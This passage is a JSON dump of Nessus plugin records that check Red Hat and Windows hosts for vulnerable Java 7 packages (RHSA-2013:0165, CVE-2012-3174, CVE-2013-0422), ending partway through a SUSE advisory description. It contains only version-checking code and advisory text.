script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.3\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:0165\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.4.el5_9.1\")) 
flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-src-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-src-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.7.0-openjdk-src-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-src-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 
audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.7.0-openjdk / java-1.7.0-openjdk-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:32:03", "description": "The version of Oracle (formerly Sun) Java SE or Java for Business installed on the remote host is earlier than 7 Update 11 and is, therefore, potentially affected by the following security issues :\n\n - An unspecified issue exists in the Libraries component. (CVE-2012-3174)\n\n - An error exists in the 'MBeanInstantiator.findClass' method that could allow remote, arbitrary code execution.\n (CVE-2013-0422)\n\nNote that, according the advisory, these issues apply to client deployments of Java only and can only be exploited through untrusted 'Java Web Start' applications and untrusted Java applets.", "cvss3": {}, "published": "2013-01-14T00:00:00", "type": "nessus", "title": "Oracle Java SE 7 < Update 11 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2022-05-25T00:00:00", "cpe": ["cpe:/a:oracle:jre", "cpe:/a:oracle:jdk"], "id": "ORACLE_JAVA7_UPDATE11.NASL", "href": "https://www.tenable.com/plugins/nessus/63521", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63521);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_bugtraq_id(57246, 57312);\n script_xref(name:\"CERT\", value:\"625617\");\n script_xref(name:\"EDB-ID\", value:\"24045\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/15\");\n\n script_name(english:\"Oracle Java SE 7 < Update 11 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a programming platform that is\npotentially affected 
by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle (formerly Sun) Java SE or Java for Business\ninstalled on the remote host is earlier than 7 Update 11 and is,\ntherefore, potentially affected by the following security issues :\n\n - An unspecified issue exists in the Libraries\n component. (CVE-2012-3174)\n\n - An error exists in the 'MBeanInstantiator.findClass'\n method that could allow remote, arbitrary code execution.\n (CVE-2013-0422)\n\nNote that, according the advisory, these issues apply to client\ndeployments of Java only and can only be exploited through untrusted\n'Java Web Start' applications and untrusted Java applets.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-002/\");\n # http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?eaf95a3d\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/technetwork/java/javase/7u11-relnotes-1896856.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to JDK / JRE 7 Update 11 or later and, if necessary, remove any\naffected versions.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-0422\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n 
script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet JMX Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jre\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jdk\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"sun_java_jre_installed.nasl\");\n script_require_keys(\"SMB/Java/JRE/Installed\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Check each installed JRE.\ninstalls = get_kb_list_or_exit(\"SMB/Java/JRE/*\");\n\ninfo = \"\";\nvuln = 0;\ninstalled_versions = \"\";\n\nforeach install (list_uniq(keys(installs)))\n{\n ver = install - \"SMB/Java/JRE/\";\n if (ver !~ \"^[0-9.]+\") continue;\n\n installed_versions = installed_versions + \" & \" + ver;\n\n if (ver =~ '^1\\\\.7\\\\.0_(0[0-9]|10)([^0-9]|$)')\n {\n dirs = make_list(get_kb_list(install));\n vuln += max_index(dirs);\n\n foreach dir (dirs)\n info += '\\n Path : ' + dir;\n\n info += '\\n Installed version : ' + ver;\n info += '\\n Fixed version : 1.7.0_11\\n';\n }\n}\n\n# Report if any were found to be vulnerable.\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n if (vuln > 1) s = \"s of Java are\";\n else s = \" of Java is\";\n\n report = \n '\\n' +\n 'The following vulnerable instance'+s+' installed on the\\n' +\n 'remote host :\\n' +\n info;\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse\n{\n installed_versions = substr(installed_versions, 3);\n if (\" & \" >< installed_versions) \n exit(0, \"The Java \"+installed_versions+\" installs on the remote host are not affected.\");\n else \n audit(AUDIT_INST_VER_NOT_VULN, \"Java\", installed_versions);\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:20:40", "description": "java-1_7_0-openjdk was updated to icedtea-2.3.4 fixing bugs and also severe security issues :\n\n - Security fixes\n\n - S8004933, CVE-2012-3174: Improve MethodHandle interaction with libraries\n\n - S8006017, CVE-2013-0422: Improve lookup resolutions\n\n - S8006125: Update MethodHandles library interacti